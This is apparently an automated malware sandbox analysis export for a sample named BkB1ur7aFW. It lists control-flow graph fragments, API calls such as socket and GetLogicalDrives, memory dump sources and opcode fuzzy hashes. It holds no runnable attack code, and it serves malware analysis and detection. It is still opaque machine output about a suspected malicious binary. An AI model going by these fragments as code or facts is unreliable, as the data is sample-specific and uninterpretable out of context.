4bad7a-4bad7f 1653->1655 1656 4bada0-4badb2 connect 1653->1656 1655->1656 1660 4bad81-4bad99 1655->1660 1662 4badb3-4badcf 1656->1662 1657->1632 1657->1645 1663 4bacc6-4bacd7 1658->1663 1659->1663 1660->1662 1670 4bae8a-4bae91 1662->1670 1671 4badd5-4badd8 1662->1671 1663->1645 1669 4bacdd-4bace5 1663->1669 1669->1649 1669->1651 1670->1612 1672 
4badda-4baddf 1671->1672 1673 4bade1-4badf1 1671->1673 1672->1653 1672->1673 1674 4bae0d-4bae12 1673->1674 1675 4badf3-4bae07 1673->1675 1676 4bae1a-4bae1c call 4baf70 1674->1676 1677 4bae14-4bae17 1674->1677 1675->1674 1681 4baea8-4baead 1675->1681 1680 4bae21-4bae23 1676->1680 1677->1676 1682 4bae93-4bae9d 1680->1682 1683 4bae25-4bae27 1680->1683 1681->1612 1684 4baeaf-4baeb1 call 4ae760 1682->1684 1685 4bae9f-4baea6 call 4ae7c0 1682->1685 1683->1612 1689 4baeb6-4baebe 1684->1689 1685->1689 1690 4baf1a-4baf1f 1689->1690 1691 4baec0-4baedb call 4ae180 1689->1691 1690->1612 1691->1612 1694 4baee1-4baeec 1691->1694 1695 4baeee-4baeff 1694->1695 1696 4baf02-4baf06 1694->1696 1695->1696 1697 4baf08-4baf0b 1696->1697 1698 4baf0e-4baf15 1696->1698 1697->1698 1698->1604
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 004BAB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004BABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: 88f3dcd5399cac0fd7bc4fdde53d5865d5ea07009f33354ac2a4022e30974e6b
                                                              • Instruction ID: e80c594d493347348bef5fc27b6ec90cdbed2250187ebf307a4253d3e272d96d
                                                              • Opcode Fuzzy Hash: 88f3dcd5399cac0fd7bc4fdde53d5865d5ea07009f33354ac2a4022e30974e6b
                                                              • Instruction Fuzzy Hash: 89E1E3706043019BEB20CF24C884BAB77E5EF85304F144A2EF9999B391D779E964CB67
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 0e864c104e8f0874651b94237ba639d6db1929de578bee0252c873be9ffbc4ea
                                                              • Instruction ID: 8daba047454efa60e66c32f745c4b6ab7010ea54a07ecc59b0b859711ea68baa
                                                              • Opcode Fuzzy Hash: 0e864c104e8f0874651b94237ba639d6db1929de578bee0252c873be9ffbc4ea
                                                              • Instruction Fuzzy Hash: 4F51F3EB16C125BE710A80951B55AFB2BAFD5DF770F338426F807DA5C2E3888B4A4171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 73f820ba47bc5e838d9294a72c9975691a9244aa678ec05bc08fe5af7cd36951
                                                              • Instruction ID: 02666c176f0865dc5e5c1857a7ad0cf051fb34ff8e339106623f5faf8eaae7bf
                                                              • Opcode Fuzzy Hash: 73f820ba47bc5e838d9294a72c9975691a9244aa678ec05bc08fe5af7cd36951
                                                              • Instruction Fuzzy Hash: EE5104EB16C125BE710A80951B54AFA2BEFD5DF770F338026F807DA5C2E3888B4A0171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: a7ebc06bb159ec4a4d0a3bc9a0ba637cb72629bc12172a14d82bf5103a181b88
                                                              • Instruction ID: d5944e0879b6885a7f1ba1bdeed9d30eb0bc1a1de477c0fa8311a9bd9bc36b96
                                                              • Opcode Fuzzy Hash: a7ebc06bb159ec4a4d0a3bc9a0ba637cb72629bc12172a14d82bf5103a181b88
                                                              • Instruction Fuzzy Hash: B051C3EB16C125FE714A80952B54AFA2AEFD5DF770F338026F807DA5C2E3984B490071
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3cd00114aa79d79f2db4010d5f4a918d4a84a06003c7efb5056083c3df2f4831
                                                              • Instruction ID: 4c969961a9cf73aa5eea15c46845b4d4ad36026cfb333600276153efa163396b
                                                              • Opcode Fuzzy Hash: 3cd00114aa79d79f2db4010d5f4a918d4a84a06003c7efb5056083c3df2f4831
                                                              • Instruction Fuzzy Hash: 3551C3EB16C125BE710A80952B54AFA2AEFD5DF770F338026F807DA6C2E3984B490171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d4bb98d50a453ccd64559d844e11b8e8c57cf9b2fcc2df0ea4d30385b99d02f6
                                                              • Instruction ID: bedb835a8887720d3db4406854581b22e95a222340ab681ceb752a353b71e2cb
                                                              • Opcode Fuzzy Hash: d4bb98d50a453ccd64559d844e11b8e8c57cf9b2fcc2df0ea4d30385b99d02f6
                                                              • Instruction Fuzzy Hash: 2451D2EB16C125BE710A80952B54AFA2AAFD5DF770F338426F807DA5C2E3884B490071
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 361fbd996e1777d7b66839f7fd08c7e6ce66dcb3d41f5364e2742957db3dd250
                                                              • Instruction ID: b2e7660bb55532a8183b04f3177bfc53e12f1ed0748c5a7e8d1ea75274fd084c
                                                              • Opcode Fuzzy Hash: 361fbd996e1777d7b66839f7fd08c7e6ce66dcb3d41f5364e2742957db3dd250
                                                              • Instruction Fuzzy Hash: 9251A3EB16C125BE724A80952B55AFB2BAFD5DF730F33842AF807D6582E3884B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: f3dc580d54fd42a8a879409c17cc59cb52756665e9e7a17c31fe992a2610e05c
                                                              • Instruction ID: ad077170e14c4a0ab711597456ced6eb08511575835b8bee72033dd85df68930
                                                              • Opcode Fuzzy Hash: f3dc580d54fd42a8a879409c17cc59cb52756665e9e7a17c31fe992a2610e05c
                                                              • Instruction Fuzzy Hash: FA51B3EB16C125BE714A80952B55AFA2BEFD5DF730F33842AF807D6582E3888B490171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d2a78043d89e4abcffe8f66c68cae4d7f4b622688ae9c24bef3f9ffcfdcabaa1
                                                              • Instruction ID: bc06e976f4170cf5e991a9c9b24e8c712945119fd03ffa8cb925e4d36eb5a125
                                                              • Opcode Fuzzy Hash: d2a78043d89e4abcffe8f66c68cae4d7f4b622688ae9c24bef3f9ffcfdcabaa1
                                                              • Instruction Fuzzy Hash: F351E5EB15C125BEB20A81952B54AFB6BAFE5DF730F338426F807D65C2E3884B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 0187bcadf11dd2d2e55cbea3625f7c06b536e784218b0f444f023c5b85b0fa24
                                                              • Instruction ID: 7e11621056ec1f7a188b898531c78ad09b9bf60d5b301ed6db89e71a7bd22ca1
                                                              • Opcode Fuzzy Hash: 0187bcadf11dd2d2e55cbea3625f7c06b536e784218b0f444f023c5b85b0fa24
                                                              • Instruction Fuzzy Hash: F351D5EB26C121BE760AC1912B54AFB6BAFD5DF730B338427F807D6582E3848B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 1966b2c9db18ea4a5f71e4da642f7ae19429bdd73dbdaa8cfbad7c3037df0068
                                                              • Instruction ID: 23de0af9a39879d23cb7928164b650d15dddd7be20fcc44af4d8c22f7270a7c2
                                                              • Opcode Fuzzy Hash: 1966b2c9db18ea4a5f71e4da642f7ae19429bdd73dbdaa8cfbad7c3037df0068
                                                              • Instruction Fuzzy Hash: B35192EB16C125BE710A80952B55AFB6BAFE5DF730B33842AF807D6582E3884B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 317d397b4ae397a54da0d321d629d2d6da3b3a691f40f250bc31151fdfa877cb
                                                              • Instruction ID: b3e8ca2005da299fb2c2c74d505cfcdc70d9d86045baa99d656ed33d4473e04c
                                                              • Opcode Fuzzy Hash: 317d397b4ae397a54da0d321d629d2d6da3b3a691f40f250bc31151fdfa877cb
                                                              • Instruction Fuzzy Hash: 0251B4FB26C125BE710A91952B54AFA6BAFD5DF730B338427F807D6582E3888B490171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: f624da5574ae004e974997ad3df3a3f4c601595fefc7cb32571eeae4f7d3df9c
                                                              • Instruction ID: aec0ca550d047a22567513cd71b077f42c21bde15347f4f1aff5e22b91cc6645
                                                              • Opcode Fuzzy Hash: f624da5574ae004e974997ad3df3a3f4c601595fefc7cb32571eeae4f7d3df9c
                                                              • Instruction Fuzzy Hash: 8851F3FB16C125BE720A81952B54AFB6BAFD5DF730B338427F807D6582E3884B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 96fc1bb6930e850a04fd25c767cc2aa2190c560ce5769f533f760790a3b8f5c3
                                                              • Instruction ID: 9321edaae1f6fa06261bf0b66c30026edcda1d65ab97549884a08801697bcd65
                                                              • Opcode Fuzzy Hash: 96fc1bb6930e850a04fd25c767cc2aa2190c560ce5769f533f760790a3b8f5c3
                                                              • Instruction Fuzzy Hash: 0E51A3EB16C125FE710A80962B55AFB2BAFD5DF730F338426F807D6582E3884B495171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 30f823f22ad3261a2f399302f5bd4046ba0f71e191727429f8b4887198c8f4fc
                                                              • Instruction ID: ee19bb7eb5dfeb96e2724f36e6b08f14fade326a2ebd9d0f12390a6c795e377d
                                                              • Opcode Fuzzy Hash: 30f823f22ad3261a2f399302f5bd4046ba0f71e191727429f8b4887198c8f4fc
                                                              • Instruction Fuzzy Hash: C751A1FB16C125FE710A80922B54AFA6BAFD5DF730B32842AF807D6582E3984B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 44a7599fe05aa4c998f951a7ff276d09c6736b0a9b2ce3faf3aa0339f9a88947
                                                              • Instruction ID: 138e7a692c1e102a716d1e9a39163043dc32cae8991c43bbccc67ebbcb8d5926
                                                              • Opcode Fuzzy Hash: 44a7599fe05aa4c998f951a7ff276d09c6736b0a9b2ce3faf3aa0339f9a88947
                                                              • Instruction Fuzzy Hash: 394193FB16C125FE7209D0952B54AFB6BAFD5DF730B32842AF807D6582E3844B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: fc0d46501a39362413a151b85d6604c242ff1b12bdab7a048b188755a5c4190d
                                                              • Instruction ID: b30986ea918e66e62b99dbe7ba9cb21a7868999710e0480f2e02a6bdee5497f8
                                                              • Opcode Fuzzy Hash: fc0d46501a39362413a151b85d6604c242ff1b12bdab7a048b188755a5c4190d
                                                              • Instruction Fuzzy Hash: 04419FFB16C125BE710AD0952B64EFA6BAFD5DF730B32842BF807D6582E3884B490171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 6cac3673df95b7d0f4029ac311f92dcc1cee7a3b2c1fb637c659e92715d133d2
                                                              • Instruction ID: 78d9ea9b583311356725d65e9cac40b16cd4558b502e160e6806a66ddefc6a70
                                                              • Opcode Fuzzy Hash: 6cac3673df95b7d0f4029ac311f92dcc1cee7a3b2c1fb637c659e92715d133d2
                                                              • Instruction Fuzzy Hash: 4F418EFB16C125BE710AD1952B64AFA2BAFE5DF730B32842BF807D5582E3984B490171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 47c7d12e5a2473a8b980af33f1cdd2c0374f14cf65ea76e76db6e5a014b6f7ea
                                                              • Instruction ID: 63cc3dc186a618f339efc1c3e757a313294bfecf03ea2c2d00ececbaf2888b50
                                                              • Opcode Fuzzy Hash: 47c7d12e5a2473a8b980af33f1cdd2c0374f14cf65ea76e76db6e5a014b6f7ea
                                                              • Instruction Fuzzy Hash: 6C4190EB16C125FE710AD1952B64AFA2BAFE5DF730B32842BF807D5582E3984B490171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7ba0320ef6fdf25f97227b18154f76d20d7184220f4f72a5923fdb00bd421550
                                                              • Instruction ID: 7dc97d63fb21eddcfcdb9c6ddf5744fd2f1a52f4ef42a908c24c859cf4d618d5
                                                              • Opcode Fuzzy Hash: 7ba0320ef6fdf25f97227b18154f76d20d7184220f4f72a5923fdb00bd421550
                                                              • Instruction Fuzzy Hash: B341F4FB11C155FEB20AD1952B54AFA6BAED5DF730B32882BF803D6582E3944B494131
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 4fcfeec5134c182d2e2f2c1eba4b98c7498bf4e05e6e41c72a1daf8c7c6ae6ac
                                                              • Instruction ID: 4881a7659d04dfbb90678a707151468adf0f24474ce7ebe842a24841b2771435
                                                              • Opcode Fuzzy Hash: 4fcfeec5134c182d2e2f2c1eba4b98c7498bf4e05e6e41c72a1daf8c7c6ae6ac
                                                              • Instruction Fuzzy Hash: FC4123FB11C225EE720AD5A16B54AFE6BAFE5DF730B32842BF803D6482E3544B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 5eca03b2cf3e0d5163fa9e6cb65313474d43f9a6808e63fcc3d06ba950a8851f
                                                              • Instruction ID: 669d4bd020faf78d4252a05334f7141beb95167fc92cab3e6f17fec7e08170c2
                                                              • Opcode Fuzzy Hash: 5eca03b2cf3e0d5163fa9e6cb65313474d43f9a6808e63fcc3d06ba950a8851f
                                                              • Instruction Fuzzy Hash: 2D41E4FB51C115BEB209D1A12B54AFA2BAFE5DB730B33842BF803D6582E3984B494171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: b4533e761aebe463dcbd383b9716823caf282fc3b1226d3c31f3cbe4d0929372
                                                              • Instruction ID: b6684dc0659518e11916965fa74adf0b6bcafcac70ee819f8c066792d3a6a851
                                                              • Opcode Fuzzy Hash: b4533e761aebe463dcbd383b9716823caf282fc3b1226d3c31f3cbe4d0929372
                                                              • Instruction Fuzzy Hash: 6E31D2FB15C125FE720AD1952B54AFA2BAFE5DF730B32842BF807D6582E3984B490171
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 09cc8de45544b533799bf3a1e30dc75d9cd5e4b2f07dccbf9069e4c9ac835029
                                                              • Instruction ID: a2d65608cab7fd5f12dba570f1dd72dc722344527e6b2ec581deb649c5452cdf
                                                              • Opcode Fuzzy Hash: 09cc8de45544b533799bf3a1e30dc75d9cd5e4b2f07dccbf9069e4c9ac835029
                                                              • Instruction Fuzzy Hash: 503117FB11C215FEB20A91A52B546FA6BFFE9DB730B32846AF803D5583E3494B494131
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 8deca90dde61eb562f2c0d95e0aa526edca88e04bc0cfb0bba98cd4e6006e7bd
                                                              • Instruction ID: 3eaedd7caa44a8415b95277b92ed0891e0a93acc25ce2572313faa3f7a592e5b
                                                              • Opcode Fuzzy Hash: 8deca90dde61eb562f2c0d95e0aa526edca88e04bc0cfb0bba98cd4e6006e7bd
                                                              • Instruction Fuzzy Hash: 2C414FFB10C255AFB606D1A51B586FA7FBFDACB730B32846BF842D6082E3944B094171
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseEvent
                                                              • String ID: multi.c
                                                              • API String ID: 2624557715-214371023
                                                              • Opcode ID: 8135017061805a6dae30ec23685abf5b254015b9ad6b638d5804b07b1a72885f
                                                              • Instruction ID: 9feff89dddbf5356745ef2b38306a0465e71553de74468ddaf372a5335ca9452
                                                              • Opcode Fuzzy Hash: 8135017061805a6dae30ec23685abf5b254015b9ad6b638d5804b07b1a72885f
                                                              • Instruction Fuzzy Hash: AB51E9B29043095FEB126B309C46B7736A8AF5135CF094438EE8D9B253FB75E509C792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 18c98a58706ca5f0ba7eecc6365e38d53a2a450d3bc95bd2f49fae13a4de3880
                                                              • Instruction ID: 056461cd947b15cdee4b90aed0299c7f57ef9763ed30b00be6f9d628cdf9ba8a
                                                              • Opcode Fuzzy Hash: 18c98a58706ca5f0ba7eecc6365e38d53a2a450d3bc95bd2f49fae13a4de3880
                                                              • Instruction Fuzzy Hash: 6031D3FB11C225FE760991A52B586FA6BBED9DB730B32846BF803D1182E3884B490131
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: b9b9035b394b49f127e1250bf3cebb0603b2f3b1b256e398e7ef1a42223b5d09
                                                              • Instruction ID: 4cac77028c50dd9b2e4018f5cad10ddf2a53d4d13cc8f61012b02196f7c86839
                                                              • Opcode Fuzzy Hash: b9b9035b394b49f127e1250bf3cebb0603b2f3b1b256e398e7ef1a42223b5d09
                                                              • Instruction Fuzzy Hash: 1C31D6FB15C125FE720991A62B54AFA6BAFD5DF730B32842BF807D6582E3884B494031
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: faa64d7e194b8c566353cb2161d0b2919d0d757bfb8ab672a16b9be657885cdd
                                                              • Instruction ID: eac54463559d2ab03c24a7da88cc16117e7fb211ee9aa6e387949c1957babd0c
                                                              • Opcode Fuzzy Hash: faa64d7e194b8c566353cb2161d0b2919d0d757bfb8ab672a16b9be657885cdd
                                                              • Instruction Fuzzy Hash: 5B3129FB11C255BFB20691A52B546FE6BAFD69B730B32846BF843D2182E3944B094032
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d67cb27e8f66cb3baf71e11856453fed2574be710ee126693b6336cb323a3485
                                                              • Instruction ID: 22aa3c5c59f7680b68fdd62d750e903eb842c1886f070e38f98959ef3537604f
                                                              • Opcode Fuzzy Hash: d67cb27e8f66cb3baf71e11856453fed2574be710ee126693b6336cb323a3485
                                                              • Instruction Fuzzy Hash: 1F31B4FB15C125FE750A95A62B58AFA6BAFD5DB730B328427F803D1582E3894B490131
                                                              Strings
